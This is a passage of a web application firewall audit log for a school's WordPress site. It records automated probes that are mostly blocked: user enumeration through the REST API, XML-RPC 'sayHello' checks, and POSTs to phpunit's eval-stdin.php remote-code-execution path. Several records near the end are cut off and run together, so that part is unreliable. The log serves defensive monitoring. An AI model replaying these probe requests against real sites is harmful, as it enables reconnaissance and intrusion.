/wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1e769d4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e769d4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445144116019 2234 (- - -) Stopwatch2: 1747445144116019 2234; combined=1062, p1=340, p2=691, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e769d4f-Z-- --69868904-A-- [17/May/2025:08:25:44 +0700] aCflmHyxdQCiyU1ENFcnqgAAAAE 103.236.140.4 43976 103.236.140.4 8181 --69868904-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.142 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --69868904-C-- demo.sayHello --69868904-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --69868904-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445144809636 4634 (- - -) Stopwatch2: 1747445144809636 4634; combined=3604, p1=415, p2=2986, p3=25, p4=26, p5=89, sr=63, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69868904-Z-- --91eb8267-A-- [17/May/2025:08:25:49 +0700] aCflnRKi5m5upc8uMd6iMQAAAMw 103.236.140.4 43982 103.236.140.4 8181 --91eb8267-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.36 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --91eb8267-C-- demo.sayHello --91eb8267-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --91eb8267-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445149989741 6369 (- - -) Stopwatch2: 1747445149989741 6369; combined=4621, p1=614, p2=3770, p3=38, p4=41, p5=95, sr=79, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91eb8267-Z-- --01d06a34-A-- [17/May/2025:08:26:08 +0700] aCflsHyxdQCiyU1ENFcnrAAAAAM 103.236.140.4 43986 103.236.140.4 8181 --01d06a34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --01d06a34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01d06a34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445168369469 2759 (- - -) Stopwatch2: 1747445168369469 2759; combined=1227, p1=423, p2=775, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01d06a34-Z-- --8932826e-A-- [17/May/2025:08:26:17 +0700] aCfluXyxdQCiyU1ENFcnrQAAAAQ 103.236.140.4 43990 103.236.140.4 8181 --8932826e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.241 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8932826e-C-- demo.sayHello --8932826e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8932826e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445177859558 4652 (- - -) Stopwatch2: 1747445177859558 4652; combined=3616, p1=448, p2=2971, p3=22, p4=24, p5=89, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8932826e-Z-- --8a21c616-A-- [17/May/2025:08:28:52 +0700] aCfmVOm4kjNN-hEbWjJA-AAAAFU 103.236.140.4 44006 103.236.140.4 8181 --8a21c616-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a21c616-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a21c616-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445332545701 2765 (- - -) Stopwatch2: 1747445332545701 2765; combined=1229, p1=421, p2=778, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a21c616-Z-- --241d9957-A-- [17/May/2025:08:28:58 +0700] aCfmWgTOsBn9MSWb6WJuqgAAAJE 103.236.140.4 44010 103.236.140.4 8181 --241d9957-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --241d9957-C-- demo.sayHello --241d9957-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --241d9957-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445338331163 6771 (- - -) Stopwatch2: 1747445338331163 6771; combined=4842, p1=578, p2=4008, p3=37, p4=41, p5=105, sr=79, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --241d9957-Z-- --fcac132a-A-- [17/May/2025:08:32:13 +0700] aCfnHem4kjNN-hEbWjJA-QAAAFg 103.236.140.4 44024 103.236.140.4 8181 --fcac132a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fcac132a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcac132a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445533092943 2850 (- - -) Stopwatch2: 1747445533092943 2850; combined=1266, p1=445, p2=789, p3=0, p4=0, p5=32, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcac132a-Z-- --fe9e897c-A-- [17/May/2025:08:32:21 +0700] aCfnJXyxdQCiyU1ENFcntQAAABI 103.236.140.4 44028 103.236.140.4 8181 --fe9e897c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.209 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fe9e897c-C-- demo.sayHello --fe9e897c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe9e897c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445541555051 4307 (- - -) Stopwatch2: 1747445541555051 4307; combined=3013, p1=436, p2=2390, p3=25, p4=29, p5=77, sr=72, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe9e897c-Z-- --dbd74753-A-- [17/May/2025:08:32:26 +0700] aCfnKum4kjNN-hEbWjJA-gAAAEA 103.236.140.4 44034 103.236.140.4 8181 --dbd74753-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.76 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dbd74753-C-- demo.sayHello --dbd74753-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbd74753-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445546270714 5808 (- - -) Stopwatch2: 1747445546270714 5808; combined=4174, p1=575, p2=3376, p3=33, p4=35, p5=93, sr=79, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbd74753-Z-- --16d58466-A-- [17/May/2025:08:32:43 +0700] aCfnO-m4kjNN-hEbWjJA-wAAAEI 103.236.140.4 44042 103.236.140.4 8181 --16d58466-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --16d58466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16d58466-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445563686671 2387 (- - -) Stopwatch2: 1747445563686671 2387; combined=1135, p1=364, p2=733, p3=0, p4=0, p5=38, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16d58466-Z-- --da410328-A-- [17/May/2025:08:32:47 +0700] aCfnP3yxdQCiyU1ENFcnugAAAAA 103.236.140.4 44044 103.236.140.4 8181 --da410328-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --da410328-C-- demo.sayHello --da410328-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --da410328-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445567319867 3883 (- - -) Stopwatch2: 1747445567319867 3883; combined=2861, p1=467, p2=2204, p3=19, p4=19, p5=89, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da410328-Z-- --c4ff7233-A-- [17/May/2025:08:32:49 +0700] aCfnQQTOsBn9MSWb6WJuqwAAAJI 103.236.140.4 44048 103.236.140.4 8181 --c4ff7233-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c4ff7233-C-- demo.sayHello --c4ff7233-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4ff7233-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445569391154 4890 (- - -) Stopwatch2: 1747445569391154 4890; combined=3786, p1=520, p2=3067, p3=24, p4=25, p5=88, sr=118, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4ff7233-Z-- --82933a72-A-- [17/May/2025:08:32:54 +0700] aCfnRnyxdQCiyU1ENFcnvAAAABc 103.236.140.4 44060 103.236.140.4 8181 --82933a72-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --82933a72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82933a72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445574649814 3358 (- - -) Stopwatch2: 1747445574649814 3358; combined=1515, p1=520, p2=961, p3=0, p4=0, p5=34, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82933a72-Z-- --dd6cf33e-A-- [17/May/2025:08:32:59 +0700] aCfnS-m4kjNN-hEbWjJA_gAAAEc 103.236.140.4 44064 103.236.140.4 8181 --dd6cf33e-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.194 X-Forwarded-Proto: http Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --dd6cf33e-C-- --dd6cf33e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd6cf33e-E-- --dd6cf33e-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --69f30237-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --69f30237-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445579749319 5674 (- - -) Stopwatch2: 1747445579749319 5674; combined=4297, p1=496, p2=3577, p3=37, p4=41, p5=86, sr=74, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69f30237-Z-- --0f87d978-A-- [17/May/2025:08:32:59 +0700] aCfnS3yxdQCiyU1ENFcnvwAAAAU 103.236.140.4 44068 103.236.140.4 8181 --0f87d978-B-- POST /vendor/phpunits/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.194 X-Forwarded-Proto: http Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --0f87d978-C-- --0f87d978-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f87d978-E-- --0f87d978-H-- Message: Access denied with code 403 (phase 2). String match " --38921031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38921031-E-- --38921031-H-- Message: Access denied with code 403 (phase 2). String match " --7b95d808-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b95d808-H-- Message: Access denied with code 403 (phase 2). String match " --8a5a3b51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a5a3b51-E-- --8a5a3b51-H-- Message: Access denied with code 403 (phase 2). String match " --d4783610-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4783610-E-- --d4783610-H-- Message: Access denied with code 403 (phase 2). String match " --01ccb607-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01ccb607-H-- Message: Access denied with code 403 (phase 2). String match " --be3e104d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be3e104d-E-- --be3e104d-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --78f77255-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78f77255-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445617684699 4624 (- - -) Stopwatch2: 1747445617684699 4624; combined=3605, p1=440, p2=2969, p3=22, p4=24, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: 